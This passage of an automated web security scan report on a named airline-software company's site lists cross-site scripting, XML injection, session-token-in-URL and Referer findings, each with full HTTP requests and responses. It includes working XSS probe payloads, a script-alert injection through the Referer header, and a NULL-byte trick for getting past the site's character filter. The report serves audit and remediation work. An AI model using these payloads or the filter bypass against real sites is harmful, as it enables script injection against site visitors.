Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:26:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>023789d0898=1">?%00df39f<a>023789d0898=1</a>
...[SNIP]...

3.141. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/consulting_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002bc49<a>094e5b00dcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bc49<a>094e5b00dcb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/consulting_services?%002bc49<a>094e5b00dcb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:29:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322619; expires=Thu, 06-Oct-2011 03:29:29 GMT; path=/
Set-Cookie: exp_last_activity=1286353769; expires=Thu, 06-Oct-2011 03:29:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:29:41 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>094e5b00dcb=1">consulting services?%002bc49<a>094e5b00dcb=1</a>
...[SNIP]...

3.142. http://www.sabreairlinesolutions.com/home/products_services/technology/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/technology/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0081621"><a>0b22d3d3d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81621"><a>0b22d3d3d40 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/technology/?%0081621"><a>0b22d3d3d40=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322231; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:33:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322231; expires=Thu, 06-Oct-2011 03:33:36 GMT; path=/
Set-Cookie: exp_last_activity=1286354015; expires=Thu, 06-Oct-2011 03:33:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts_services%2Ftechnology%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:33:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22109


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/technology/?%0081621"><a>0b22d3d3d40=1">
...[SNIP]...

3.143. http://www.sabreairlinesolutions.com/home/includes/form_list [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_list

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ca5"><script>alert(1)</script>56456157c47 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /home/includes/form_list HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
Referer: http://www.google.com/search?hl=en&q=40ca5"><script>alert(1)</script>56456157c47

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:30:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:30:40 GMT; path=/
Set-Cookie: exp_last_activity=1286379040; expires=Thu, 06-Oct-2011 10:30:40 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:30:41 GMT
Pragma: no-cache
Content-Length: 2248
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="http://www.google.com/search?hl=en&q=40ca5"><script>alert(1)</script>56456157c47" />
...[SNIP]...

4. XML injection  previous  next
There are 2 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


4.1. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [__utmb cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/web_services

Issue detail

The __utmb cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the __utmb cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /home/products_services/product/web_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079]]>>; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:15:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322903; expires=Thu, 06-Oct-2011 03:15:47 GMT; path=/
Set-Cookie: exp_last_activity=1286352947; expires=Thu, 06-Oct-2011 03:15:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:16:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<li>Increases development speed; uses XML, SOAP and travel industry standards,</li>
...[SNIP]...

4.2. http://www.sabreairlinesolutions.com/home/products_services/product/web_services [exp_last_visit cookie]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/web_services

Issue detail

The exp_last_visit cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the exp_last_visit cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /home/products_services/product/web_services HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086]]>>; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:53:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322903; expires=Thu, 06-Oct-2011 02:53:46 GMT; path=/
Set-Cookie: exp_last_activity=1286351626; expires=Thu, 06-Oct-2011 02:53:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A4%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:53:51 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21949


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<li>Increases development speed; uses XML, SOAP and travel industry standards,</li>
...[SNIP]...

5. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabresonic_global_conference2

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /home/news_events/event/sabresonic_global_conference2 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 18:30:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286321449; expires=Wed, 05-Oct-2011 18:30:51 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 18:31:40 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<p><a href="http://www1.hilton.com/en_US/hi/hotel/DFWAHHF-Hilton-DFW-Lakes-Executive-Conference-Center-Texas/index.do;jsessionid=F57D2DACFFCDA4F0D4D59B9FB2247200.etc81?brand_id=HI&amp;brand_directory=/en/hi/&amp;xch=694469540,N3FDY4YMODSWGCSGBIV222Q">Hilton DFW Lakes Executive Conference Center</a>
...[SNIP]...

6. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_list

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:10:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:10:44 GMT; path=/
Set-Cookie: exp_last_activity=1286377844; expires=Thu, 06-Oct-2011 10:10:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:10:44 GMT
Pragma: no-cache
Content-Length: 2258
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/" />
<input type="text" name="subject" value="" style="display:none;" />
<table>
<tr>
<td><label for="name">name*</label></td>
<td><input type="text" name="name" id="name" class="required" /></td>
</tr>
<tr>
<td><label for="email">e-mail*</label></td>
<td><input type="text" name="email" id="email" class="required email" /></td>
</tr>
<tr>
<td><label for="phone">phone</label></td>
<td><input type="text" name="phone" id="phone" /></td>
</tr>
<tr>
<td><input type="checkbox" name="self" id="self" value='y' checked="checked" /></td>
<td><label for="self">send me a copy of my list</label></td>
</tr>
<tr>
<td><input type="checkbox" name="sales" value="y" id="sales" /></td>
<td><label for="sales">I would like a sales representative to contact me</label></td>
</tr>
<tr>
<td><label for="colleague">colleague(s)</label></td>
<td><textarea name="colleague" id="colleague"></textarea></td>
</tr>
<tr>
<td><input type="checkbox" name="subscribe" value='y' id="subscribe" /></td>
<td><label for="subscribe">YES, I would like to receive e-mail with more information on Sabre Airline
Solutions... </label></td>
</tr>

<tr>
<td></td>
<td><input type="submit" class="pp_submit" value="submit" /></td>
</tr>
</table>
<br />
<div class="error"><span></span></div>
</form>
</div>
</div>

</body>
</html>

Request 2

GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:14:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286323073; expires=Thu, 06-Oct-2011 10:14:28 GMT; path=/
Set-Cookie: exp_last_activity=1286378068; expires=Thu, 06-Oct-2011 10:14:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:14:29 GMT
Pragma: no-cache
Content-Length: 2168
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input type="hidden" name="page" value="" />
<input type="text" name="subject" value="" style="display:none;" />
<table>
<tr>
<td><label for="name">name*</label></td>
<td><input type="text" name="name" id="name" class="required" /></td>
</tr>
<tr>
<td><label for="email">e-mail*</label></td>
<td><input type="text" name="email" id="email" class="required email" /></td>
</tr>
<tr>
<td><label for="phone">phone</label></td>
<td><input type="text" name="phone" id="phone" /></td>
</tr>
<tr>
<td><input type="checkbox" name="self" id="self" value='y' checked="checked" /></td>
<td><label for="self">send me a copy of my list</label></td>
</tr>
<tr>
